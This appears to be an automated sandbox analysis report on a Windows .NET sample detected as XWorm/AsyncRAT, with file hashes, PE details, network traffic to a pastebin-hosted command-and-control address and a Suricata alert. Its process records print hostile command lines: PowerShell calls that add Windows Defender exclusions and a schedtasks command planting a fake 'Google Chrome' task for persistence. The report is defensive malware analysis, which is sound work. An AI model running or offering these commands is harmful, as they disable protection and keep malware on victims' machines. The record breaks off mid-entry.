                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ngnhwcvm.aja.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oc3n1yqj.ksu.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q1qef1pw.o4u.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xowavlga.vjg.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):6.017233981963163
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name:ra66DSpa.exe
                                                  File size:78'848 bytes
                                                  MD5:12ac7eecca99175c8953b8368d96440e
                                                  SHA1:aa6fcf14c66644111d1160a6dd4cdb67c58e709a
                                                  SHA256:9d7a88aa72820977134b39b0ae1907fd738de184b89ce72fbb77cee530a10e49
                                                  SHA512:5d5f775b32182c6aab302462a2b8e9a2d608f232df2dc02c3826405e4a3a46ef040e8249feaf2133dee3ed3f111aeb4e884fdb4edae743dbc6e255c40eb51c9e
                                                  SSDEEP:1536:SId+Mwkxo+YjhKfK3qmVc0i+bLEf/Hk8q+OiY86dyCMpKpOBdGqkgQGM:SKX8KqqmVcb+bL6/VFPoy5KpOBbM
                                                  TLSH:24738D587BE54429F1BFAFB46DF16246D678F7231813C26F28C5018A0A33E89C9507FA
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,..f.................(..........>F... ...`....@.. ....................................@................................

                                                  File Icon

                                                  Icon Hash:00928e8e8686b000

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x41463e
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x66F7F22C [Sat Sep 28 12:10:20 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x145e80x53.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x602.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x180000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000x126440x128004049029aa633b14110a94893a2bfd617False0.6175834037162162data6.10285081370132IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rsrc0x160000x6020x800500e9eb3093d4c68302b49f6751ecc82False0.32861328125data3.4723828207295924IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0x180000xc0x20023c92956a7e4071d4829a441b0077b53False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_VERSION0x160a00x378data0.42004504504504503
                                                  RT_MANIFEST0x164180x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                  Imports

                                                  DLLImport
                                                  mscoree.dll_CorExeMain

                                                  Network Behavior

                                                  Suricata IDS Alerts

                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2024-10-04T01:48:03.617687+02002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.653844147.185.221.2142956TCP

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Oct 4, 2024 01:47:50.521373987 CEST53843443192.168.2.6104.20.4.235
                                                  Oct 4, 2024 01:47:50.521473885 CEST44353843104.20.4.235192.168.2.6
                                                  Oct 4, 2024 01:47:50.521780968 CEST53843443192.168.2.6104.20.4.235
                                                  Oct 4, 2024 01:47:50.532305956 CEST53843443192.168.2.6104.20.4.235
                                                  Oct 4, 2024 01:47:50.532341957 CEST44353843104.20.4.235192.168.2.6
                                                  Oct 4, 2024 01:47:51.003957033 CEST44353843104.20.4.235192.168.2.6
                                                  Oct 4, 2024 01:47:51.004062891 CEST53843443192.168.2.6104.20.4.235
                                                  Oct 4, 2024 01:47:51.012216091 CEST53843443192.168.2.6104.20.4.235
                                                  Oct 4, 2024 01:47:51.012259960 CEST44353843104.20.4.235192.168.2.6
                                                  Oct 4, 2024 01:47:51.012631893 CEST44353843104.20.4.235192.168.2.6
                                                  Oct 4, 2024 01:47:51.067183018 CEST53843443192.168.2.6104.20.4.235
                                                  Oct 4, 2024 01:47:51.074868917 CEST53843443192.168.2.6104.20.4.235
                                                  Oct 4, 2024 01:47:51.115448952 CEST44353843104.20.4.235192.168.2.6
                                                  Oct 4, 2024 01:47:52.743880987 CEST44353843104.20.4.235192.168.2.6
                                                  Oct 4, 2024 01:47:52.743999004 CEST44353843104.20.4.235192.168.2.6
                                                  Oct 4, 2024 01:47:52.744158983 CEST53843443192.168.2.6104.20.4.235
                                                  Oct 4, 2024 01:47:52.757507086 CEST53843443192.168.2.6104.20.4.235
                                                  Oct 4, 2024 01:47:52.899888039 CEST5384442956192.168.2.6147.185.221.21
                                                  Oct 4, 2024 01:47:52.904766083 CEST4295653844147.185.221.21192.168.2.6
                                                  Oct 4, 2024 01:47:52.904865980 CEST5384442956192.168.2.6147.185.221.21
                                                  Oct 4, 2024 01:47:53.041532040 CEST5384442956192.168.2.6147.185.221.21
                                                  Oct 4, 2024 01:47:53.046658039 CEST4295653844147.185.221.21192.168.2.6
                                                  Oct 4, 2024 01:48:03.617686987 CEST5384442956192.168.2.6147.185.221.21
                                                  Oct 4, 2024 01:48:03.622833014 CEST4295653844147.185.221.21192.168.2.6
                                                  Oct 4, 2024 01:48:14.192465067 CEST5384442956192.168.2.6147.185.221.21
                                                  Oct 4, 2024 01:48:14.197442055 CEST4295653844147.185.221.21192.168.2.6
                                                  Oct 4, 2024 01:48:14.282731056 CEST4295653844147.185.221.21192.168.2.6
                                                  Oct 4, 2024 01:48:14.282896042 CEST5384442956192.168.2.6147.185.221.21
                                                  Oct 4, 2024 01:48:14.348550081 CEST5384442956192.168.2.6147.185.221.21
                                                  Oct 4, 2024 01:48:14.349926949 CEST5384542956192.168.2.6147.185.221.21
                                                  Oct 4, 2024 01:48:14.353404999 CEST4295653844147.185.221.21192.168.2.6
                                                  Oct 4, 2024 01:48:14.355096102 CEST4295653845147.185.221.21192.168.2.6
                                                  Oct 4, 2024 01:48:14.355454922 CEST5384542956192.168.2.6147.185.221.21
                                                  Oct 4, 2024 01:48:14.384497881 CEST5384542956192.168.2.6147.185.221.21
                                                  Oct 4, 2024 01:48:14.389254093 CEST4295653845147.185.221.21192.168.2.6
                                                  Oct 4, 2024 01:48:28.676569939 CEST5384542956192.168.2.6147.185.221.21
                                                  Oct 4, 2024 01:48:28.681560993 CEST4295653845147.185.221.21192.168.2.6
                                                  Oct 4, 2024 01:48:35.800874949 CEST4295653845147.185.221.21192.168.2.6
                                                  Oct 4, 2024 01:48:35.800937891 CEST5384542956192.168.2.6147.185.221.21
                                                  Oct 4, 2024 01:48:35.927014112 CEST5384542956192.168.2.6147.185.221.21
                                                  Oct 4, 2024 01:48:35.928304911 CEST5384642956192.168.2.6147.185.221.21
                                                  Oct 4, 2024 01:48:35.931896925 CEST4295653845147.185.221.21192.168.2.6
                                                  Oct 4, 2024 01:48:35.933423042 CEST4295653846147.185.221.21192.168.2.6
                                                  Oct 4, 2024 01:48:35.937217951 CEST5384642956192.168.2.6147.185.221.21
                                                  Oct 4, 2024 01:48:35.973851919 CEST5384642956192.168.2.6147.185.221.21
                                                  Oct 4, 2024 01:48:35.978732109 CEST4295653846147.185.221.21192.168.2.6
                                                  Oct 4, 2024 01:48:46.739145041 CEST5384642956192.168.2.6147.185.221.21
                                                  Oct 4, 2024 01:48:46.853003025 CEST4295653846147.185.221.21192.168.2.6
                                                  Oct 4, 2024 01:48:57.316607952 CEST4295653846147.185.221.21192.168.2.6
                                                  Oct 4, 2024 01:48:57.316692114 CEST5384642956192.168.2.6147.185.221.21

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Oct 4, 2024 01:47:39.918234110 CEST5360142162.159.36.2192.168.2.6
                                                  Oct 4, 2024 01:47:41.382519960 CEST53531401.1.1.1192.168.2.6
                                                  Oct 4, 2024 01:47:50.507186890 CEST6144053192.168.2.61.1.1.1
                                                  Oct 4, 2024 01:47:50.514502048 CEST53614401.1.1.1192.168.2.6
                                                  Oct 4, 2024 01:47:52.886837959 CEST5287753192.168.2.61.1.1.1
                                                  Oct 4, 2024 01:47:52.898610115 CEST53528771.1.1.1192.168.2.6

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Oct 4, 2024 01:47:50.507186890 CEST192.168.2.61.1.1.10xadcaStandard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                  Oct 4, 2024 01:47:52.886837959 CEST192.168.2.61.1.1.10x3841Standard query (0)stay-brook.gl.at.ply.ggA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Oct 4, 2024 01:47:50.514502048 CEST1.1.1.1192.168.2.60xadcaNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                  Oct 4, 2024 01:47:50.514502048 CEST1.1.1.1192.168.2.60xadcaNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                  Oct 4, 2024 01:47:50.514502048 CEST1.1.1.1192.168.2.60xadcaNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                  Oct 4, 2024 01:47:52.898610115 CEST1.1.1.1192.168.2.60x3841No error (0)stay-brook.gl.at.ply.gg147.185.221.21A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • pastebin.com

                                                  HTTPS Proxied Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.653843104.20.4.2354434540C:\Users\user\Desktop\ra66DSpa.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-03 23:47:51 UTC74OUTGET /raw/hhG5zGXd HTTP/1.1
                                                  Host: pastebin.com
                                                  Connection: Keep-Alive
                                                  2024-10-03 23:47:52 UTC388INHTTP/1.1 200 OK
                                                  Date: Thu, 03 Oct 2024 23:47:52 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  x-frame-options: DENY
                                                  x-content-type-options: nosniff
                                                  x-xss-protection: 1;mode=block
                                                  cache-control: public, max-age=1801
                                                  CF-Cache-Status: MISS
                                                  Last-Modified: Thu, 03 Oct 2024 23:47:52 GMT
                                                  Server: cloudflare
                                                  CF-RAY: 8cd0d1d48e2242b7-EWR
                                                  2024-10-03 23:47:52 UTC35INData Raw: 31 64 0d 0a 73 74 61 79 2d 62 72 6f 6f 6b 2e 67 6c 2e 61 74 2e 70 6c 79 2e 67 67 3a 34 32 39 35 36 0d 0a
                                                  Data Ascii: 1dstay-brook.gl.at.ply.gg:42956
                                                  2024-10-03 23:47:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:19:46:53
                                                  Start date:03/10/2024
                                                  Path:C:\Users\user\Desktop\ra66DSpa.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\ra66DSpa.exe"
                                                  Imagebase:0x6b0000
                                                  File size:78'848 bytes
                                                  MD5 hash:12AC7EECCA99175C8953B8368D96440E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2096216513.00000000006B2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2096216513.00000000006B2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                  Reputation:low
                                                  Has exited:false

                                                  General

                                                  Target ID:2
                                                  Start time:19:46:56
                                                  Start date:03/10/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe'
                                                  Imagebase:0x7ff6e3d50000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:3
                                                  Start time:19:46:56
                                                  Start date:03/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:5
                                                  Start time:19:47:03
                                                  Start date:03/10/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ra66DSpa.exe'
                                                  Imagebase:0x7ff6e3d50000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:6
                                                  Start time:19:47:03
                                                  Start date:03/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:8
                                                  Start time:19:47:13
                                                  Start date:03/10/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Google Chrome.exe'
                                                  Imagebase:0x7ff6e3d50000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:9
                                                  Start time:19:47:13
                                                  Start date:03/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:10
                                                  Start time:19:47:27
                                                  Start date:03/10/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Google Chrome.exe'
                                                  Imagebase:0x7ff6e3d50000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:11
                                                  Start time:19:47:27
                                                  Start date:03/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:14
                                                  Start time:19:47:49
                                                  Start date:03/10/2024
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Google Chrome" /tr "C:\Users\user\AppData\Local\Google Chrome.exe"
                                                  Imagebase:0x7ff727c20000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:15
                                                  Start time:19:47:49
                                                  Start date:03/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:16
                                                  Start time:19:47:50
                                                  Start date:03/10/2024
                                                  Path:C:\Users\user\AppData\Local\Google Chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Local\Google Chrome.exe"
                                                  Imagebase:0xa60000
                                                  File size:78'848 bytes
                                                  MD5 hash:12AC7EECCA99175C8953B8368D96440E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Google Chrome.exe, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Google Chrome.exe, Author: ditekSHen
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 68%, ReversingLabs
                                                  Has exited:true

                                                  General

                                                  Target ID:17
                                                  Start time:19:48:01
                                                  Start date:03/10/2024
                                                  Path:C:\Users\user\AppData\Local\Google Chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Local\Google Chrome.exe"
                                                  Imagebase:0x7ff799c70000
                                                  File size:78'848 bytes
                                                  MD5 hash:12AC7EECCA99175C8953B8368D96440E
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:18
                                                  Start time:19:48:01
                                                  Start date:03/10/2024
                                                  Path:C:\Users\user\AppData\Local\Google Chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Local\Google Chrome.exe"
                                                  Imagebase:0x880000
                                                  File size:78'848 bytes
                                                  MD5 hash:12AC7EECCA99175C8953B8368D96440E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:19
                                                  Start time:19:48:09
                                                  Start date:03/10/2024
